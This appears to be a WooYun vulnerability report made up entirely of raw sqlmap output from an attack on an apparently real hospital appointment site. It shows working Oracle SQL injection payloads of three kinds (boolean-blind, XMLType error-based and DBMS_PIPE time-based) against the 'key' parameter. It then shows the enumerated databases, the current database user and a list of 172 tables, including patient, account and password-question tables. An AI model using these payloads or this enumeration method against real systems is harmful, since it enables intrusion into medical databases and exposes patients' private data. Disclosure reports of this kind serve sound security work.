WooYun.org

sqlmap identified the following injection points with a total of 57 HTTP(s) requests:
---
Place: GET
Parameter: key
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: class=3&key=1%' AND 9642=9642 AND '%'='
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: class=3&key=1%' AND 2535=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(119)||CHR(118)||CHR(101)||CHR(113)||(SELECT (CASE WHEN (2535=2535) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(100)||CHR(113)||CHR(100)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: class=3&key=1%' AND 6727=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(98)||CHR(119)||CHR(116),5) AND '%'='
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
available databases [16]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HBJDYF
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: key
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: class=3&key=1%' AND 9642=9642 AND '%'='
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: class=3&key=1%' AND 2535=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(119)||CHR(118)||CHR(101)||CHR(113)||(SELECT (CASE WHEN (2535=2535) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(100)||CHR(113)||CHR(100)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: class=3&key=1%' AND 6727=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(98)||CHR(119)||CHR(116),5) AND '%'='
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
current user:    'HBJDYF'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: key
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: class=3&key=1%' AND 9642=9642 AND '%'='
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: class=3&key=1%' AND 2535=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(119)||CHR(118)||CHR(101)||CHR(113)||(SELECT (CASE WHEN (2535=2535) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(100)||CHR(113)||CHR(100)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: class=3&key=1%' AND 6727=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(98)||CHR(119)||CHR(116),5) AND '%'='
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
Database: HBJDYF
[172 tables]
+-------------------------------+
| ACCOUNT                       |
| ACCOUNT_FORGETPASSWORD        |
| ACCOUNT_INTEGRAL              |
| ACCOUNT_PWDANSWER             |
| ACCOUNT_PWDQUESTION           |
| ACCOUNT_STAT                  |
| AGC_DEPARTMENT                |
| AGC_DEPARTMENTCONFIG          |
| AGC_DEPARTMENTNAVIGATION      |
| AGC_DEPARTMENTVSDISEASE       |
| AGC_DEPARTMENTVSWARD          |
| AGC_HOSPITAL                  |
| AGC_HOSPITALCARD              |
| AGC_HOSPITALEMPSTAT           |
| AGC_HOSPITALMAPS              |
| AGC_HOSPITALVSCARDTYPE        |
| AGC_VACATION                  |
| AGC_WARD                      |
| API_SERVERCONFIG              |
| AUTH_AGCGROUP                 |
| AUTH_AUTHORITYDIR             |
| AUTH_CONFIGURATION            |
| AUTH_GROUPS                   |
| AUTH_MODULEAUTHORITYLIST      |
| AUTH_MODULES                  |
| AUTH_MODULETYPE               |
| AUTH_ROLEAUTHORITYLIST        |
| AUTH_ROLES                    |
| AUTH_USERGROUPS               |
| AUTH_USERMODULEAUTHORITYLIST  |
| AUTH_USERROLES                |
| AUTH_USERSINGROUP             |
| BLOG_CONFIG                   |
| BLOG_POST                     |
| BLOG_TOPIC                    |
| CHAT_CATEGORY                 |
| CHAT_CATEGORYGROUP            |
| CHAT_MESSAGE                  |
| CHAT_STAT                     |
| CLINIC_APPOINTMENT            |
| CLINIC_APPOINTMENTHISTORYLOG  |
| CLINIC_APPOINTMENTLOG         |
| CLINIC_APPOINTMENTNOCARDLIMIT |
| CLINIC_BANKREGIST             |
| CLINIC_BLACKLIST              |
| CLINIC_BLACKLISTLOG           |
| CLINIC_FROMTYPE               |
| CLINIC_LABEL                  |
| CLINIC_LABELCONFIG            |
| CLINIC_LABELSTAT              |
| CLINIC_LABELSTATLOG           |
| CLINIC_LABELTYPE              |
| CLINIC_LIMITNUMAGC            |
| CLINIC_LIMITSPECIALITYAGC     |
| CLINIC_LIMITSPECIALITYLABEL   |
| CLINIC_PATIENTSTAT            |
| CLINIC_REASON                 |
| CLINIC_RECORD                 |
| CLINIC_RECORDHISTORYLOG       |
| CLINIC_RECORDLOG              |
| CLINIC_REGIST                 |
| CLINIC_REGISTLOG              |
| CLINIC_REGISTRATIONPRICE      |
| CLINIC_REGIST_DELETE          |
| CLINIC_REGIST_RESERVATION     |
| CLINIC_SCHEDULE               |
| CLINIC_STOPRECORD             |
| CMS_AD                        |
| CMS_ADPLACE                   |
| CMS_ADTYPE                    |
| CMS_CATEGORY                  |
| CMS_CATEGORYGROUP             |
| CMS_CONTENT                   |
| CMS_CONTENTCOMMENT            |
| CMS_CONTENTSTAT               |
| CMS_CONTENTVSAGC              |
| CMS_CONTENTVSCATEGORY         |
| CMS_FRIENDLINK                |
| CMS_SHOP                      |
| CMS_SLIDE                     |
| CODESMITH_EXTENDED_PROPERTIES |
| CONFIG_BASICINFO              |
| CONFIG_EXTRAINFO              |
| COOPERATION_UNICOMQR          |
| DATA_ACCCOUNTTYPE             |
| DATA_AREA                     |
| DATA_CARDTYPE                 |
| DATA_CHANNELTYPE              |
| DATA_CLINICAPPOINTMENTSTATUS  |
| DATA_CMSCATEGORYTYPE          |
| DATA_CONTACTTYPE              |
| DATA_DEGREE                   |
| DATA_DEPARTMENTPROPERTY       |
| DATA_DEPARTMENTTYPE           |
| DATA_DISEASE                  |
| DATA_DISEASETYPE              |
| DATA_DUTY                     |
| DATA_EDUCATION                |
| DATA_HOSPITALLEVEL            |
| DATA_HOSPITALTYPE             |
| DATA_MARRIAGE                 |
| DATA_NATION                   |
| DATA_OPERATETYPE              |
| DATA_PAPERSTYPE               |
| DATA_POLITICAL                |
| DATA_PROFESSION               |
| DATA_RETURNVISIT              |
| DATA_SEX                      |
| DATA_SKINS                    |
| DATA_TITLE                    |
| EMP_BASICINFO                 |
| EMP_DOCTORVSDISEASE           |
| EMP_EXTRAINFO                 |
| FORUM_CATEGORY                |
| FORUM_CATEGORYGROUP           |
| FORUM_POST                    |
| FORUM_TOPIC                   |
| HB114_HBPARTVSHOSPITAL        |
| LOG_OPERAATIONTYPE            |
| LOG_OPERATE_01                |
| LOG_OPERATE_02                |
| LOG_OPERATE_03                |
| LOG_OPERATE_04                |
| LOG_OPERATE_05                |
| LOG_OPERATE_06                |
| LOG_OPERATE_07                |
| LOG_OPERATE_08                |
| LOG_OPERATE_09                |
| LOG_OPERATE_10                |
| LOG_OPERATE_11                |
| LOG_OPERATE_12                |
| LOG_OPERATION                 |
| LOG_OPERATIONHISTORY          |
| MEM_BASICINFO_OLD_TEMP        |
| MEM_BILLITEMS                 |
| MEM_CARD                      |
| MEM_CONTACT                   |
| MEM_EXTRAINFO                 |
| MEM_PATIENT                   |
| MEM_PATIENTTYPE               |
| MEM_PATIENTVSTYPE             |
| PASSPORT                      |
| PASSPORT_ACTIVE               |
| PASSPORT_EXTRAINFO            |
| PASSPORT_VSACCOUNT            |
| PHOTO_CATEGORY                |
| PHOTO_CATEGORYTYPE            |
| PHOTO_PICTURE                 |
| QUEST_ANSWER                  |
| QUEST_OVSQ                    |
| QUEST_QUESTION                |
| QUEST_QUESTIONAIRE            |
| QUEST_QUESTIONTYPE            |
| QUEST_QVSQUESTION             |
| QUEST_RECORD                  |
| SERVER_FLATORDER              |
| SERVER_SMSBLACKLIST           |
| SERVER_SMSBLACKLISTLOG        |
| SERVER_SMSBLACKREASON         |
| SERVER_SMSRECEIVE             |
| SERVER_SMSRECEIVELOG          |
| SERVER_SMSSEND                |
| SERVER_SMSSENDLOG             |
| SMS_CONFIG                    |
| SMS_LIST                      |
| SMS_LISTLOG                   |
| SMS_SYS                       |
| SMS_TYPE                      |
| SPELL_CODES                   |
| SYNC_DATA                     |
| SYNC_DATAHB114                |
| WEIXIN_VSACCOUNT              |
+-------------------------------+